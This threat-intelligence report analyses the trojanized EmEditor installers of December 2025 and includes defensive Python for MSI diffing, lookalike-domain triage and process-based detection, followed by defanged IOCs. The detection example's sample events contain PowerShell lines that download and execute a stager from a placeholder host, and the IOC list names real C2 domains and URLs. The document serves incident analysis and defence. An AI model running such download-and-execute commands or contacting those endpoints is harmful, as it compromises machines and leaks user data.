In late December 2025, a sophisticated software supply chain compromise was discovered affecting EmEditor, a widely-used Windows text editor developed by Emurasoft, Inc. EmEditor is trusted by developers, systems administrators, and security professionals for large file editing, syntax highlighting, and automation capabilities. Attackers leveraged this trust in the official distribution channel to deliver malware to unsuspecting end users, illustrating the growing threat of supply chain attacks on mainstream desktop software.
What Happened
Between December 19 and December 22, 2025, and again around December 29, 2025, users downloading EmEditor from the official website were served backdoored installers that contained hidden malicious code. Instead of delivering legitimate EmEditor binaries, attackers delivered a trojanized installer that executed additional malware on the victim’s system.
Unlike typical malware distribution — where malicious code arrives through email attachments or third-party sites — this incident occurred through trusted infrastructure: the official EmEditor website and its download link. Because the installer was delivered from legitimate domains and was even digitally signed (albeit with a fraudulent certificate issued to an unrelated entity, “WALSHAM INVESTMENTS LIMITED”), the usual trust signals were misleading and did not raise immediate suspicion.
This kind of attack, where attackers compromise the supply or distribution mechanism of software rather than the software itself, is the hallmark of a supply chain compromise — a high-impact tactic increasingly exploited by advanced threat actors.
Technical Anatomy of the Attack
Two Distinct Waves
Investigators reconstructed the attack timeline using timestamps extracted from installers, domain registrations, and file metadata:
- First Wave (Dec 19–22, 2025)
- Attackers altered the EmEditor site’s Download Now button to point to a malicious installer.
- Backdoored installers were generated, digitally signed with a fraudulent certificate, and made available during this window.
- The attackers had pre-registered control infrastructure (domains) days before the first malicious installer appeared.
- Second Wave (Dec 29, 2025)
- Shortly after Emurasoft released a new official build (v25.4.4), the attackers again delivered backdoored installers.
- A new round of domains was registered to support the second wave of compromise.
The gap between these waves suggests either a refinement of attack tooling or a pause to recalibrate infrastructure in the face of detection risk.
Installer Manipulation & Forensic Indicators
Researchers used differential analysis of MSI (Windows Installer) files to isolate injected artifacts. Key findings include:
Custom Installer Actions
By comparing known good installers against compromised ones, analysts identified additional custom actions and scripts embedded within MSI tables. Specifically:
- A Visual Basic Script custom action named PatchFile was inserted, closely mirroring legitimate MSI table actions but redirecting execution flow to malicious code.
- In early variants, the command sequence used an incorrect PowerShell cmdlet (Invoke-WebRequest) and failed to execute payloads reliably; later variants corrected this to Invoke-RestMethod, enabling successful next-stage payload download and execution.
MSI Metadata Artifacts
Installers contain internal metadata (“SummaryInformation”) including timestamps and user identifiers. In backdoored builds:
- Inconsistent timestamps (earlier than expected) flagged manipulation.
- A non-vendor username was present, offering a weak but useful indicator for clustering samples.
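The two forensic techniques above (differential comparison of MSI contents, and triage of SummaryInformation metadata) can be reproduced with a short script. The following is an added example, not tooling from the report or from Emurasoft. It assumes the analyst has already extracted the MSI's OLE streams as a mapping of raw stream name to bytes (for instance with olefile's listdir/openstream or with msitools); the stream-name decoder implements the documented MSI name encoding, and the "known good" and "suspect" stream sets, the vendor user list and the official build time are all constructed placeholders.

```python
import hashlib
from dataclasses import dataclass
from datetime import datetime, timezone

# Alphabet used by the MSI stream-name encoding (64 symbols: digits, A-Z, a-z, '.', '_').
_MSI_ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._"


def decode_msi_stream_name(raw: str) -> str:
    """Decode a raw OLE stream name from an MSI into readable form.

    MSI packs two alphabet characters into one UTF-16 code unit in the range
    U+3800..U+47FF, a single trailing character into U+4800..U+483F, and uses
    U+4840 as the prefix that marks a database table (rendered here as '!').
    """
    out = []
    for ch in raw:
        c = ord(ch)
        if 0x3800 <= c < 0x4800:
            c -= 0x3800
            out.append(_MSI_ALPHABET[c & 0x3F])
            out.append(_MSI_ALPHABET[c >> 6])
        elif 0x4800 <= c < 0x4840:
            out.append(_MSI_ALPHABET[c - 0x4800])
        elif c == 0x4840:
            out.append("!")
        else:
            out.append(ch)  # e.g. the '\x05SummaryInformation' stream is not encoded
    return "".join(out)


def encode_msi_stream_name(name: str) -> str:
    """Inverse of decode_msi_stream_name; used here only to build the constructed samples."""
    table = name.startswith("!")
    body = name[1:] if table else name
    out = ["\u4840"] if table else []
    i = 0
    while i < len(body):
        a = _MSI_ALPHABET.index(body[i])
        if i + 1 < len(body):
            out.append(chr(0x3800 + a + (_MSI_ALPHABET.index(body[i + 1]) << 6)))
            i += 2
        else:
            out.append(chr(0x4800 + a))
            i += 1
    return "".join(out)


def diff_installers(known_good: dict, suspect: dict) -> dict:
    """Compare two installers given as {raw stream name: stream bytes}.

    Returns decoded stream names that were added, removed or changed. An injected
    custom action shows up as a new Binary.* stream plus modified table streams.
    """
    good = {decode_msi_stream_name(k): hashlib.sha256(v).hexdigest() for k, v in known_good.items()}
    bad = {decode_msi_stream_name(k): hashlib.sha256(v).hexdigest() for k, v in suspect.items()}
    return {
        "added": sorted(set(bad) - set(good)),
        "removed": sorted(set(good) - set(bad)),
        "modified": sorted(n for n in good.keys() & bad.keys() if good[n] != bad[n]),
    }


@dataclass
class SummaryInfo:
    """Fields of the MSI SummaryInformation stream that matter for triage."""
    author: str
    last_saved_by: str
    create_time: datetime
    last_saved_time: datetime


def summary_info_anomalies(info: SummaryInfo, vendor_users: set, official_build_time: datetime) -> list:
    """Flag the two metadata signals the analysis relied on: a username that is
    not the vendor's, and timestamps earlier than they should be."""
    findings = []
    for label, user in (("author", info.author), ("last_saved_by", info.last_saved_by)):
        if user not in vendor_users:
            findings.append(f"{label} {user!r} is not a known vendor user")
    if info.last_saved_time < info.create_time:
        findings.append("last-saved time precedes creation time")
    if info.last_saved_time < official_build_time:
        findings.append("last-saved time is earlier than the official build it claims to be")
    return findings


# Constructed sample: a minimal "known good" stream set and a tampered copy that
# gains a Binary.PatchFile script and edited CustomAction/InstallExecuteSequence tables.
KNOWN_GOOD = {
    encode_msi_stream_name("!_Tables"): b"tables",
    encode_msi_stream_name("!_StringData"): b"strings",
    encode_msi_stream_name("!CustomAction"): b"vendor actions",
    encode_msi_stream_name("!InstallExecuteSequence"): b"vendor sequence",
    "\x05SummaryInformation": b"summary",
}
SUSPECT = dict(KNOWN_GOOD)
SUSPECT.update({
    encode_msi_stream_name("!CustomAction"): b"vendor actions + PatchFile",
    encode_msi_stream_name("!InstallExecuteSequence"): b"vendor sequence + PatchFile",
    encode_msi_stream_name("Binary.PatchFile"): b"' VBScript stager (constructed placeholder)",
})

# Constructed metadata: the vendor user list and the official build time are assumptions.
VENDOR_USERS = {"vendor-build"}
OFFICIAL_BUILD_TIME = datetime(2025, 12, 22, 0, 0, 0, tzinfo=timezone.utc)
SUSPECT_INFO = SummaryInfo(
    author="vendor-build", last_saved_by="user",
    create_time=datetime(2025, 12, 20, 13, 0, 0, tzinfo=timezone.utc),
    last_saved_time=datetime(2025, 12, 20, 13, 15, 17, tzinfo=timezone.utc),
)

if __name__ == "__main__":
    print(diff_installers(KNOWN_GOOD, SUSPECT))
    print(summary_info_anomalies(SUSPECT_INFO, VENDOR_USERS, OFFICIAL_BUILD_TIME))
```

Run against real files, the diff step is what surfaces a new Binary.PatchFile stream and a changed CustomAction table even when the vendor's own binaries are untouched; the metadata step is deliberately a weak signal, useful for clustering samples rather than for a verdict on its own.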
Network and C2 Infrastructure
Investigators identified command-and-control (C2) infrastructure tied to the attack:
- Malicious domains resolved to servers configured to redirect PowerShell stager download requests.
- Some domains predated the main compromise, suggesting ongoing reuse for other malicious campaigns.
- Clusters of related domains displayed similar webserver behavior (HTTP 301 redirects or simple redirect responses), enabling defenders to derive additional indicators of compromise (IOCs).
Malware Payload & Post-Compromise Behavior
Once the backdoored installer ran on a victim system, it did more than install EmEditor. Beneath the surface, the malicious installer triggered a PowerShell-based loader that fetched subsequent payloads from attacker-controlled infrastructure. While the exact payloads vary across samples, they fall into the infostealer class — malware designed to extract sensitive information from infected machines.
Infostealer malware typically aims to harvest:
- Stored credentials
- Browser history and session tokens
- SSH keys or code repositories
- Other sensitive local artifacts
Because the loader and payload were delivered post-installation, many legacy defenses that only inspect the installer binary would miss these activities entirely.
Why This Matters
This incident underscores several worrying trends in modern cybersecurity:
1. Trusted Channels Are Not Safe
Even well-maintained official distribution points can be compromised — sometimes without the software developer’s direct involvement (e.g., via compromised CMS platforms or redirect logic).
2. Digital Authenticity Can Be Faked
Malicious actors are increasingly willing to acquire fraudulent digital certificates to sign malware, eroding the trust model that digital signatures are supposed to provide.
3. Supply Chain Attacks Are Escalating
Software supply chain compromises have grown across ecosystems — from npm and PyPI packages targeting developers and blockchain wallets to desktop applications like EmEditor — making them one of the most pressing security challenges.
Defensive Lessons & Recommendations
Based on the analysis, defenders can adopt several strategic controls:
Early Infrastructure Detection
Monitoring domain registrations and web configurations related to popular software projects can provide early warning signals before malware drops occur.
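The C2 infrastructure section above notes that related domains shared hosting and redirect behaviour, and this section recommends watching registrations that reference popular software. The following added example (not from the report or the vendor) shows both steps on the domain records listed in the IOC section: it flags newly registered lookalikes of a brand token, then pivots on shared IP addresses to pull in domains the name check alone would miss. The brand tokens, the set of domains assumed to belong to the vendor (emeditor.com, emurasoft.com), the observation window and the one benign registration (editorial-news.com) are assumptions added for the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass
class DomainRecord:
    """One newly observed domain with the attributes a registration feed or passive DNS provides."""
    name: str
    registrar: str
    created: datetime
    ips: frozenset


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch near-misses of a brand label (e.g. a dropped letter)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def second_level_label(domain: str) -> str:
    """'emeditorjp.com' -> 'emeditorjp' (naive split; adequate for the gTLDs used here)."""
    return domain.lower().split(".")[0]


def lookalike_brand(domain: str, brands: dict, max_distance: int = 2):
    """Return the brand token a domain imitates, or None.

    brands maps a token to the set of domains the vendor really owns. A domain
    matches if its label contains the token or is within max_distance edits of it.
    """
    owned = set().union(*brands.values())
    if domain.lower() in owned:
        return None
    label = second_level_label(domain)
    for token in brands:
        if token in label or levenshtein(label, token) <= max_distance:
            return token
    return None


def pivot_on_ip(records) -> dict:
    """Group domains sharing a hosting IP; returns {ip: sorted domains} for IPs used by more than one domain."""
    by_ip = defaultdict(set)
    for r in records:
        for ip in r.ips:
            by_ip[ip].add(r.name)
    return {ip: sorted(names) for ip, names in by_ip.items() if len(names) > 1}


def triage(records, brands: dict, window_start: datetime) -> dict:
    """Flag brand lookalikes registered since window_start, then expand the set via shared IPs."""
    flagged = {}
    for r in records:
        token = lookalike_brand(r.name, brands)
        if token and r.created >= window_start:
            flagged[r.name] = token
    clusters = pivot_on_ip(records)
    related = set()
    for names in clusters.values():
        if any(n in flagged for n in names):
            related.update(names)
    return {"flagged": flagged, "related_via_ip": sorted(related - set(flagged)), "clusters": clusters}


def _utc(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


# Domain records taken from the report's IOC list, plus one constructed benign
# registration (editorial-news.com) to show a non-match.
SAMPLE_RECORDS = [
    DomainRecord("cachingdrive.com", "NameSilo, LLC", _utc("2025-12-22T09:26:51Z"), frozenset({"147.45.50.54"})),
    DomainRecord("emeditorde.com", "NameSilo, LLC", _utc("2025-12-19T17:17:38Z"), frozenset({"46.28.70.245"})),
    DomainRecord("emeditorgb.com", "NameSilo, LLC", _utc("2025-12-19T19:39:26Z"), frozenset({"5.101.82.159"})),
    DomainRecord("emeditorjapan.com", "NameSilo, LLC", _utc("2025-12-22T20:10:31Z"), frozenset({"5.101.82.118"})),
    DomainRecord("emeditorjp.com", "NameSilo, LLC", _utc("2025-12-17T15:23:21Z"), frozenset({"5.101.82.118"})),
    DomainRecord("emeditorltd.com", "NameSilo, LLC", _utc("2025-12-22T19:39:49Z"), frozenset({"5.101.82.159"})),
    DomainRecord("emedjp.com", "NameSilo, LLC", _utc("2025-12-22T20:21:13Z"), frozenset({"46.28.70.245"})),
    DomainRecord("emedorg.com", "NameSilo, LLC", _utc("2025-12-22T20:55:29Z"), frozenset({"5.101.82.118"})),
    DomainRecord("emurasoftwares.com", "NameSilo, LLC", _utc("2025-12-29T07:53:30Z"),
                 frozenset({"138.124.67.183", "5.101.82.159"})),
    DomainRecord("editorial-news.com", "Example Registrar", _utc("2025-12-20T08:00:00Z"), frozenset({"203.0.113.10"})),
]

# Brand tokens to watch and the domains assumed to belong to the vendor (assumption, not from the report).
BRANDS = {"emeditor": {"emeditor.com"}, "emurasoft": {"emurasoft.com"}}
WINDOW_START = _utc("2025-12-15T00:00:00Z")

if __name__ == "__main__":
    print(triage(SAMPLE_RECORDS, BRANDS, WINDOW_START))
```

On this data the name check catches the six domains that embed "emeditor" or "emurasoft", while emedjp.com and emedorg.com are only reached through the IP pivot (they share 46.28.70.245 and 5.101.82.118 with flagged domains). cachingdrive.com, which hosts the stager rather than imitating the brand, is found by neither step, which is the usual limit of registration monitoring and the reason the report pairs it with installer analysis.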
Differential Installer Analysis
Tools that perform byte-level and structural comparison of installers can uncover injected actions or scripts absent from legitimate builds.
Endpoint Detection Beyond Signatures
Relying solely on signatures (including digital certificates) is insufficient. Behavioral analytics, execution tracing, and network monitoring offer better visibility into real-time compromise.
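The payload section noted that the loader ran after installation, where installer-only inspection cannot see it, and this section argues for behavioural visibility. The following added example (not from the report) shows the kind of behavioural rule an endpoint team would write for the described chain: PowerShell spawned by msiexec.exe with a download cmdlet such as Invoke-WebRequest or Invoke-RestMethod on its command line. The process-creation events are constructed in a Sysmon-like shape, the stager URL is a placeholder, and the scoring weights and threshold are assumptions; only the cmdlet names and the installer filename come from the report.

```python
import re

# Signals on the PowerShell command line, weighted so that a plain vendor
# post-install script scores below the alert threshold.
DOWNLOAD_PATTERN = re.compile(
    r"(invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|downloadstring|downloadfile|net\.webclient)", re.I)
EXEC_PATTERN = re.compile(r"(invoke-expression|\biex\b|-enc(odedcommand)?\b)", re.I)
EVASION_PATTERN = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-ep\s+bypass|-executionpolicy\s+bypass)", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, for either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict):
    """Return (score, reasons) for one process-creation event.

    Only the msiexec.exe -> PowerShell parent/child pair is scored; anything
    else returns 0 so the rule stays narrow.
    """
    reasons = []
    if basename(ev["parent_image"]) != "msiexec.exe" or basename(ev["image"]) not in POWERSHELL:
        return 0, reasons
    score = 2
    reasons.append("PowerShell spawned by msiexec (installer custom action)")
    cl = ev["command_line"]
    if DOWNLOAD_PATTERN.search(cl):
        score += 3
        reasons.append("download cmdlet on command line")
    if EXEC_PATTERN.search(cl):
        score += 2
        reasons.append("in-memory execution or encoded command")
    if EVASION_PATTERN.search(cl):
        score += 1
        reasons.append("hidden window / profile or policy bypass")
    return score, reasons


def detect(events, threshold: int = 5) -> list:
    """Events at or above the threshold, as (event id, score, reasons)."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["id"], score, reasons))
    return hits


# Constructed process-creation events (not real telemetry). Event 2 mirrors the
# corrected stager (Invoke-RestMethod), event 3 the early Invoke-WebRequest variant,
# event 5 a benign vendor post-install script that must not alert.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'msiexec.exe /i "C:\Users\alice\Downloads\emed64_25.4.3.msi"'},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "command_line": 'powershell.exe -NoProfile -WindowStyle Hidden -Command '
                     '"Invoke-RestMethod https://stager.example.invalid/s | Invoke-Expression"'},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "command_line": 'powershell.exe -Command "Invoke-WebRequest https://stager.example.invalid/s '
                     '-OutFile C:\\Users\\alice\\AppData\\Local\\Temp\\x.ps1"'},
    {"id": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell.exe -Command "Get-ChildItem C:\\Projects"'},
    {"id": 5, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "command_line": 'powershell.exe -ExecutionPolicy Bypass -File "C:\\Program Files\\Vendor\\post-install.ps1"'},
]

if __name__ == "__main__":
    for event_id, score, reasons in detect(SAMPLE_EVENTS):
        print(event_id, score, "; ".join(reasons))
```

The parent/child pair alone is not enough, since legitimate installers also run PowerShell custom actions (event 5 scores 3 and stays silent); it is the download cmdlet, and optionally the in-memory execution, that lifts events 2 and 3 over the threshold. Pairing this with network telemetry (a first-seen domain answering the request with a redirect) gives the second signal the report suggests.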
Conclusion
The EmEditor supply chain compromise represents a high-value case study in software distribution exploitation. By leveraging trusted infrastructure and social trust signals, attackers successfully ensnared unsuspecting users with infostealer malware bundled inside a legitimate-appearing installer.
Organizations — especially those in development and IT operations — should treat this incident as a call to reevaluate how trust is established in software supply chains and strengthen detection mechanisms across infrastructure, build systems, and endpoint environments.
Indicators of Compromise (IOCs)
Files
SHA256: 3d1763b037e66bbde222125a21b23fc24abd76ebab40589748ac69e2f37c27fc
Filename: emed64_25.4.3.msi
Sample Type: Binary/Archive/MSI
CustomAction: PatchFile
Cmdlet: Invoke-WebRequest
CustomAction SHA256: bcfda6fca68dfa203de0db0624b73a9ac22592eae708c12f17d4fff8ec99e9fc
C2 Domain: emeditorjp[.]com
Modified Timestamp: 2025-12-20T13:15:17Z
SHA256: 4bea333d3d2f2a32018cd6afe742c3b25bfcc6bfe8963179dad3940305b13c98
Filename: emed64_25.4.3.msi
Sample Type: Binary/Archive/MSI
CustomAction: PatchFile
Cmdlet: Invoke-RestMethod
CustomAction SHA256: a04727075910c90456043985e9d5119342adc77f1b45e76a7e1a79f92c1facd6
C2 Domain: emeditorjp[.]com
Modified Timestamp: 2025-12-21T13:39:07Z
SHA256: ad84f28e9bb0fcaf30846b2563a353b649ab6dc85b36d4bf58ee61a2a95b740a
Filename: emed64_25.4.3.msi
Sample Type: Binary/Archive/MSI
CustomAction: PatchFile
Cmdlet: Invoke-RestMethod
CustomAction SHA256: 7ec4ec4511404553934e0bf08f3f124544f9a76857089feb96277ddad4f15592
C2 Domain: emeditorltd[.]com
Modified Timestamp: 2025-12-29T12:37:07Z
SHA256: da59acc764bbd6b576bef6b1b9038f592ad4df0eed894b0fbd3931f733622a1a
Filename: emed64_25.4.4.msi
Sample Type: Binary/Archive/MSI
CustomAction: RemoveShortcut
Cmdlet: Invoke-WebRequest
CustomAction SHA256: 7ec4ec4511404553934e0bf08f3f124544f9a76857089feb96277ddad4f15592
C2 Domain: emeditorltd[.]com
Modified Timestamp: 2025-12-31T23:42:57Z
SHA256: 9a5be7789d31b5b0bcb92b807efffa4d96292b093921076b678a2234b30b8423
Sample Type: Text/PowerShell
C2 Domain: cachingdrive[.]com
SHA256: 78d2244ea1c3cca2d18f754a9f0e15cabe2859817dfa803583901139764a0e6c
File Type: Text/PowerShell
C2 Domain: cachingdrive[.]com
C2 Domain: emeditorde[.]com
SHA256: a310dcb08c77acfeda03437bc4b0f180198de9c9832df2cbb64758c82eb774c7
File Type: Text/PowerShell
C2 Domain: cachingdrive[.]com
SHA256: c0bbfb17e2817567265f46cbad61cb5922c67931c6fc2d9d59fb071fe214d411
File Type: Text/PowerShell
C2 Domain: cachingdrive[.]com
SHA256: edce6cabb33e84ffb4be9ee3377f326657e16b005f90d22267e0dfaab9561366
File Type: Text/PowerShell
C2 Domain: cachingdrive[.]com
SHA256: 9bb8543453878d3390593ff76f9ab6dc8209e14f64dea51f82882309fd6ede23
File Type: Text/PowerShell
C2 Domain: emeditorde[.]com
SHA256: 660fdf42c9c32a68fc36dfd8b009dfc57f9424c6a77e8525fab044bbf419829b
File Type: Text/PowerShell
C2 Domain: emeditorde[.]com
C2 Domain: emeditorgb[.]com
SHA256: 0727237bb0aee8ac452eeeb2250cf9760ed78a67115c6466b8c4414e3d89a1c7
File Type: PowerShell
C2 Domain: emeditorde[.]com
C2 Domain: emeditorgb[.]com
SHA256: 12ef3b455e93ac089495bbbf432a1c20c041bfde17903d154e4c730248f294f9
File Type: Text/PowerShell
C2 Domain: 4kkaxgfdw7l1yvv4t9v[.]com
SHA256: 511d5dd4cfc7c7d5297d31bb234669fdf01b41da4b2399e039385c0b130021f4
File Type: Text/PowerShell
C2 Domain: 795n5qr4vk02wibh[.]com
SHA256: 5c182c9ff2429f6f56952c3ddd20684aefd026f2f094ee216335186551c939b8
File Type: Text/PowerShell
C2 Domain: 8mrzhrdm0obptpp[.]com
Domains
Domain: cachingdrive[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-22T09:26:51Z
Certificate: 2025-12-22T10:07:08Z
IP: 147.45.50[.]54
Domain: emeditorde[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-19T17:17:38Z
Certificate: 2025-12-19T19:20:21Z
IP: 46.28.70[.]245
Domain: emeditorgb[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-19T19:39:26Z
Certificate: 2025-12-20T09:52:56Z
IP: 5.101.82[.]159
Domain: emeditorjapan[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-22T20:10:31Z
Certificate: 2025-12-22T19:29:24Z
IP: 5.101.82[.]118
Domain: emeditorjp[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-17T15:23:21Z
IP: 5.101.82[.]118
Domain: emeditorltd[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-22T19:39:49Z
Certificate: 2025-12-22T18:51:39Z
IP: 5.101.82[.]159
Domain: emedjp[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-22T20:21:13Z
Certificate: 2025-12-22T19:32:44Z
IP: 46.28.70[.]245
Domain: emedorg[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-22T20:55:29Z
IP: 5.101.82[.]118
Domain: emurasoftwares[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-29T07:53:30Z
Certificate: 2025-12-29T08:55:10Z
IP: 138.124.67[.]183
Certificate: 2025-12-29T09:07:03Z
IP: 5.101.82[.]159
Domain: 08qodmaloshm5zrwhww[.]xyz
State: Sinkholed
Domain: 0xax86xdizce7kg9cpdk[.]online
State: Sinkholed
Domain: 1a298k7iqspq52l4r9e[.]space
State: Sinkholed
Domain: 8mfi71rtud8fov5[.]org
State: Sinkholed
Domain: 973jgnzjgnwupd1nu[.]space
State: Sinkholed
Domain: afdwtyy38efzk[.]app
State: Unregistered
Domain: brt461jnbjvm52mw[.]biz
State: Sinkholed
Domain: daj54smzpklt5kjq[.]space
State: Sinkholed
Domain: gs9uuz4h0510qhob[.]io
State: Unregistered
Domain: z2ctmmm61dm0c3wfic[.]store
State: Unregistered
Domain: 795n5qr4vk02wibh[.]com
Registrar: NameCheap, Inc.
Created Date: 2025-06-26T17:05:19Z
Certificate: 2025-10-09T10:33:34Z
IP: 79.132.130[.]62
IP: 81.90.29[.]48
Domain: 4kkaxgfdw7l1yvv4t9v[.]com
Registrar: Web Commerce Communications Limited dba WebNic.cc
Created Date: 2025-06-05T03:40:17Z
Certificate: 2025-06-12T03:39:34Z
IP: 93.152.217[.]77
Domain: 8mrzhrdm0obptpp[.]com
Registrar: NameCheap, Inc.
Created Date: 2025-04-03T06:50:17Z
Certificate: 2025-04-12T12:42:43Z
IP: 89.169.15[.]2
Domain: keyactivate[.]cc
Registrar: Global Domain Group LLC
Created Date: 2025-12-12T00:34:40Z
Certificate: 2025-12-12T06:44:53Z
IP: 64.188.83[.]146
Domain: orangewater00[.]com
Registrar: NameCheap, Inc.
Created Date: 2026-01-22T22:04:24Z
Certificate: 2026-01-23T13:12:15Z
IP: 185.178.231[.]112
IPs
147.45.50[.]54
46.28.70[.]245
5.101.82[.]159
5.101.82[.]118
138.124.67[.]183
89.169.15[.]2
79.132.130[.]62
81.90.29[.]48
93.152.217[.]77
64.188.83[.]146
185.178.231[.]112
URLs
URL: hxxps[://]8mrzhrdm0obptpp[.]com/take/hAUjZrJo/{UUID}
Request: 3225ae94dcda9e408d87ec48694d7bfe60b125dfb4cd0c4bf19ade3772be7519
Response: d5f5a1b854eaa992731c6e17f10fe73987730e783697ecff85514c85dcff7f9f
URL: hxxps[://]4kkaxgfdw7l1yvv4t9v[.]com/take/XstQk8Ja/{UUID}
Request: 45d4802564ceadc829898791bda4a2ac6351ef529701200009b2f00b8d63c93b
Response: 10a4d863e7b90372c5de25dc9eea9cc107625e7389cd0fb500f5a99c43d39db8
URL: hxxps[://]795n5qr4vk02wibh[.]com/take/WWboshwF/{UUID}
Request: 30862ae481048915ea927c6c57b6a7d7611eada62c972dacc8d1bb1545937cf9
Response: 0af7d28482a67828e62972085b5000bfe3d8b81200e9e51b86db0a9a8e720c8f
hxxps[://]keyactivate[.]cc/gate/start/e805d522
hxxps[://]orangewater00[.]com/run/mMbcjy2q
